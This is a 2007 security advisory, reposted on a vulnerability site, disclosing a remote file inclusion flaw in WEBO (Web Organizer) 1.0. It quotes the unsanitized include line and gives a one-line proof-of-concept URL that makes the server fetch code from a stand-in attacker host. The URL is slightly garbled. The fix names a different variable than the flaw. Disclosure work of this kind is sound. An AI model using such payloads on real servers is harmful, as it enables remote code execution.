Security Advisory: [ECHO_ADV_67$2007] WEBO (Web Organizer) <= 1.0 (baseDir) Remote File Inclusion Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Remote File Include In Script Coppermine Photo Gallery
  Lazarus Guestbook (admin.
php)Remote File Include Expliot
  dynaliens v2.0/v2.1 bypass admin authentification + XSS
  xss in phpmyadmin >=2.8.0 and < 2.10.0

From: erdc_(at)_echo.or.id <erdc_(at)_echo.or.id>
Date: 09.03.2007
Subject: [ECHO_ADV_67$2007] WEBO (Web Organizer) <= 1.0 (baseDir) Remote File Inclusion Vulnerability

ECHO_ADV_67$2007

---------------------------------------------------------------------------------
--------
[ECHO_ADV_67$2007] WEBO (Web Organizer) <= 1.0 (baseDir) Remote File Inclusion Vulnerability
---------------------------------------------------------------------------------
--------

Author         : M.Hasran Addahroni
Date           : March, 9th 2007
Location       : Australia, Sydney
Web            : http://advisories.echo.or.id/adv/adv67-K-159-2007.txt
Critical Lvl   : Dangerous
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   : WEBO (Web Organizer)
version       : 1.0
Vendor        : http://sourceforge.net/projects/weborganizer/
Description :

WEBO (Web Organizer) is an open-source Web application suite providing a groupware calendar, a personal address book, a shared contacts directory, and a personal desktop page.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~
- Invalid include function at modules/abook/foldertree.php :

---------------foldertree.php--------------------------------------
<?php

/* memento :
       TreeFolder( $label, $url="", $target="", $icon = "", $id="", $options="" )
       TreeItem( $label, $url, $target="", $icon="", $options="" )
*/

include_once( "$baseDir/lib/HTML/tree.php");
...
------------------------------------------------------------------

Variables $baseDir are not properly sanitized.
When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.

Poc/Exploit:
~~~~~~~~~~

http://www.target.com/[webo_path]/modules/abook/foldertree.php?baseDir==lass="fixed">http://attacker.com/evil?

Solution:
~~~~~~~

- Sanitize variable $config_dir on affected files.
- Turn off register_globals

---------------------------------------------------------------------------

Shoutz:
~~~~~
~ ping - my dearest wife, and my little son, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative, str0ke (for the best comments)
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry, x16
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~

    K-159 || echo|staff || eufrato[at]gmail[dot]com
    Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

test server